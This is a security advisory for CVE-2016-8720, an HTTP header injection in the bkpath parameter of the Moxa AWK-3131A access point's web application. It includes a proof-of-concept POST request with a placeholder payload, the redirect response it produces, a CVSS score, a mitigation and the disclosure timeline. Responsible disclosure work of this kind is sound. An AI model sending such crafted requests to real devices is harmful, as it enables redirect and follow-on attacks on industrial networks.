Moxa AWK-3131A Web Application bkpath HTTP Header Injection Vulnerability(CVE-2016-8720)

### Summary An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response. ### Tested Versions Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1 ### Product URLs http://www.moxa.com/product/AWK-3131A.htm ### CVSSv3 Score 3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N ### Details An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks. ### Exploit Proof-of-Concept Request ``` POST /forms/iw_webSetParameters HTTP/1.1 Host: <device IP> User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://<device IP>/time_set.asp Cookie: Password508=<valid token> Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 486 iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE ``` Response ``` HTTP/1.0 302 Redirect Server: GoAhead-Webs Date: Mon Oct 31 17:33:45 2016 Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Expires: -1 Content-Type: text/html Location: http://<device IP>/EVIL_INJECTION <html><head></head><body> ..This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>. ..Please update your documents to reflect the new location. ..</body></html> ``` ### Mitigation To significantly mitigate risk of exploitation, disable the web application before the device is deployed. ### Timeline * 2016-11-14 - Vendor Disclosure * 2017-04-10 - Public Release ### CREDIT * Discovered by Patrick DeSantis of Cisco Talos.